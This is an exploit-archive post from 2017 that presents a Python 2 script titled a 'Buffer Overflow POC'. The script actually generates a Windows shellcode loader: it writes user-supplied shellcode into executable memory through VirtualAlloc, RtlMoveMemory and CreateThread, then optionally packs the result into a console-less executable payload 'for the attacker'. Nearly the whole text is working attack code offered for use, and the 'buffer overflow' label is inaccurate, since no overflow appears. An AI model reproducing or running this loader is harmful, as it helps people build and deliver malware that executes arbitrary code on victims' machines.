Python 2.x Buffer Overflow
Posted on 24 January 2017
#!/usr/bin/env python ### #Exploit : Python 2.x Buffer Overflow POC #Tested on : Windows XP , Windows 7 #Authors : Sultan Albalawi & Chaitanya [@bofheaded] #Discovery date : 21/jan/2017 #GitHub : https://github.com/ChaitanyaHaritash/My-Exploits/blob/master/python2.x_bof.py #Video : https://youtu.be/hcc6Y55PWBg #Image : https://postimg.org/image/dn5x3ww9v/ ### ### # Usage :::: ### #1. Run exploit.py #2. Save your shellcode into some text file #3. Input Path of text file containing shellcode #4. The .py file will be generated with shellcode. #5. *Optional - Attacker just need to select option 'y' in running code.. and can have .exe payload from .py code generated :) ### # NOTE :::: ### #pyinstaller must be installed if user wants exe payload from python payload generated initially #This exploit is windows compatible :) #calc.exe shellcode => #http://pastebin.com/vBssgg99 import time,shutil,os,sys if os.name == 'posix': print "Sorry this exploit is not compatible to linux :( " exit() else: banner = """ Python 2.x Buffer Overflow POC Authors : Sultan Albalawi & Chaitanya [@bofheaded] Susupcious Shell Activity [SSA] """ print banner class make: def __init__(self,): print "" def fii (self,): print "" if __name__ == '__main__': shell = str(raw_input('Input Path To Your shellcode.txt file >> ')) txt = open(shell) myshell = txt.read() raw = """ import ctypes ban=10 for i in range(ban): print "|/"*i shellcode = bytearray("""+myshell+""") myci = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0), ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000), ctypes.c_int(0x40)) buf = (ctypes.c_char * len(shellcode)).from_buffer(shellcode) ctypes.windll.kernel32.RtlMoveMemory(ctypes.c_int(myci), buf, ctypes.c_int(len(shellcode))) ht = ctypes.windll.kernel32.CreateThread(ctypes.c_int(0), ctypes.c_int(0), ctypes.c_int(myci), ctypes.c_int(0), ctypes.c_int(0), ctypes.pointer(ctypes.c_int(0))) ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(ht),ctypes.c_int(-1)) """ f = open ('stub.py' , 'w') f.write(raw) f.close() print "done !" build_exe = str(raw_input('Would You like to have an executable payload ? (y|n)>> ')) if build_exe == 'y': os.system('C:Python27Scriptspyinstaller --noconsole --onefile stub.py') print "Please Wait ...." time.sleep(2) else: print ('byee') make()